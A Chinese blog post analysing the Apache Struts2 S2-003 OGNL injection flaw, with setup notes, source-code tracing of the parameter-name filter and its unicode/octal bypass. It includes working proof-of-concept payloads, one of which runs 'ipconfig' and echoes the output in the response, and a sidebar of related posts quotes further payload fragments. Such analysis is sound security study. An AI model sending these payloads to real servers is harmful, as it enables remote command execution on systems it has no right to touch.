S2-003 远程代码执行漏洞

最新推荐文章于 2023-03-28 16:17:17 发布
最新推荐文章于 2023-03-28 16:17:17 发布
阅读量1.3k 收藏
点赞数

漏洞信息

漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-003

漏洞成因官方概述:XWork ParameterInterceptors bypass allows OGNL statement execution

漏洞影响:

环境搭建

s2-003漏洞的payload用到了特殊字符,在高版本tomcat中会失败,需要使用tomcat6来测试。我使用的是6.0.9版本。此外导入的struts版本为2.0.11.2

漏洞利用

POC:

('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'calc\')')(bla)(bla)

回显

('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023mycmd\u003d\'ipconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))

漏洞分析

在struts/xwork-2.0.5-sources.jar!/com/opensymphony/xwork2/interceptor/ParametersInterceptor.java:177 获取到我们传入的参数

getValueStack之前,执行了一些初始化操作,比如:

OgnlContextState.setDenyMethodExecution(contextMap, true);

xwork.MethodAccessor.denyMethodExecution设置为true。为了能够调用方法,需要在poc中的第一部分将denyMethodExecution设置为false,之后才能任意代码执行。

跟入setParameters(action, stack, parameters);至 struts/struts/xwork-2.0.5-sources.jar!/com/opensymphony/xwork2/interceptor/ParametersInterceptor.java:201。此部分开始通过迭代器取出一个个传入的参数,并进行处理。

假设此时我传入的参数如下,注意这个与poc的不同在于,我将第一个\u0023替换成了#

('#context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'calc\')')(bla)(bla)

跟入acceptableName至 struts/xwork-2.0.5-sources.jar!/com/opensymphony/xwork2/interceptor/ParametersInterceptor.java:271

protected boolean acceptableName(String name) {
        if (isAccepted(name) && !isExcluded(name)) {
            return true;
        }
        return false;
    }

跟入isAccepted(name)

这里通过简单的正则表达式[\p{Graph}&&[^,#:=]]*来检测,防止传入恶意特殊字符开头如#等。因此acceptableName返回false,接下来的ognl表达式自然也不会执行了。

if (acceptableName) {
    Object value = entry.getValue();
    ...
}

但如果传入经过编码后的payload。#对应的unicode为\u0023,八进制为\43,则可以绕过上述的检测,也即导致acceptableName为true,从而进一步执行。

在设置denyMethodExecution为false后,poc的第二部分就是通过方法调用来执行任意命令了:

('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\'calc\')')(bla)(bla)

 

FLy_鹏程万里
关注
专栏目录
S2-005 远程代码执行漏洞
玄道的网安博客
06-27 703
影响版本 2.0.0 ~2.1.8.1 环境搭建 cd vulhub/struts2/s2-005 docker-compose build && docker-compose up -d 漏洞复现 发生数据包包 GET /example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%..
S2-015 远程代码执行漏洞
玄道的网安博客
06-28 620
影响版本 2.0.0 - 2.3.14.2 环境搭建 cd vulhub/struts2/s2-015 docker-compose build && docker-compose up -d 漏洞分析 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: <package name="S2-015" extends="struts-default"> <action name="*" c
Struts2 S2-003
卧龙居
10-24 2293
Struts2 S2-003影响的版本是低于2.0.12以下的,所以搭建的环境使用低于2.0.12的最近一次版本,2.0.11.2。 环境搭建: 1.项目结构: 2.pom.xml里的配置: 3.web.xml的配置: 4.struts.xml的配置 : 5.LoginAction.java代码: 6.ind
『Java安全』Struts2 2.1.8.1 参数名OGNL注入漏洞S2-003复现与浅析
Ho1aAs‘s Blog
08-01 1177
Struts2解析参数名称使用了OGNL表达式,构建恶意OGNL表达式会造成注入。
[旧文系列] Struts2历史高危漏洞系列-part1:S2-001/S2-003/S2-005
mole_exp的博客
01-17 1290
文章目录关于<旧文系列>前言S2-001漏洞复现和分析可回显PoC漏洞修复S2-003漏洞复现与分析可回显PoC漏洞修复S2-005漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
struts2远程执行漏洞学习(三)
ice
02-24 212
        这个是终结部分了。     除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWrite...
vulhub靶场struts2漏洞复现
weixin_44300286的博客
03-06 2460
0x01、S2-001远程代码执行漏洞 原理 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本 Struts 2.0.0 - Struts 2.0.8 poc 执行任意命令 %{#a=(new java.lan
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
复现S2-045远程代码执行漏洞
weixin_67813445的博客
03-28 214
Apache官方发布Struts 2 紧急漏洞公告(S2-045),CVE编号CVE-2017-5638。公告中披露 ,当基于Jakarta插件上传文件时,可导致远程代码执行。例如在系统中获得管理员权限,执行添加用户。可任意查看、修改或删除文件。造成机密数据泄露,重要信息遭到篡改等重大危害。
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
复现S2-052远程代码执行漏洞
NLXHBM的博客
04-18 672
1.启动环境 docker-compose up -d 2.查找Ubuntu ip 3.burpsuite进行抓包 4. 发送以下数据包 POST /orders/3 HTTP/1.1 Host: 192.168.81.168:8080 Content-Length: 2419 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.81.168:8080 Conten..
S2-013/S2-014 远程代码执行漏洞
玄道的网安博客
06-28 545
前言 S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。 影响版本 2.0.0 - 2.3.14.1 环境搭建 cd vulhub/struts2/s2-013 docker-compose build && docker-compose up -d 漏洞复现 测试是否存在漏洞 http://yourIP:8080/link.action?a=%24{
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2920
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
Struts2著名RCE漏洞引发的十年之思
weixin_34018169的博客
04-19 582
从2007年7月23日发布的第一个Struts2漏洞S2-001到2017年12月发布的最新漏洞S2-055,跨度足足有十年,而漏洞的个数也升至55个。分析了Struts2的这55个漏洞发现,基本上是RCE、XSS、CSRF、DOS、目录遍历和其他功能缺陷漏洞等等。本篇文章,重点关注威胁性较大的那些著名RCE漏洞,也是***们比较喜欢利用的。 要说著名RCE(远程代码执行)漏洞,Struts2框架...
struts2/xwork的漏洞
06-12 162
介绍struts2/xwork的Remote Command Execution Vulnerability漏洞,剖析了原因并供给了处理方法,能够拜见http://my-corner.iteye.com/blog/720209 去struts官网逛了一下,发现第一种处理方法晋级到struts2.2版别(当时的最新版),最终仍是没有彻底处理该疑问。当前,需求处理该疑问需求更新至2.3.1.2或
S2-005 远程代码执行漏洞检测与利用
a1b2c3是弱口令
12-11 2882
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法...
Struts 2命令执行漏洞
a65783305的博客
06-29 237
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。 这个漏洞的细节描述公布在exploit-db 上。 在这里简单摘述如下: XWork通过getters/setters...
Struts2/XWork 安全漏洞及解决办法
个人积累
08-11 2246
<br />exploit-db网站在7月14日爆出了一个Struts2远程执行任意代码漏洞。 <br />漏洞名称:Struts2/XWork < 2.2.0 Remote Command Execution Vulnerability <br />相关介绍: http://www.exploit-db.com/exploits/14360/ http://sebug.net/exploit/19954/ <br /><br />Struts2的核心是使用的webwork框架,处理 action时通过
S2-052远程代码执行漏洞
最新发布
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值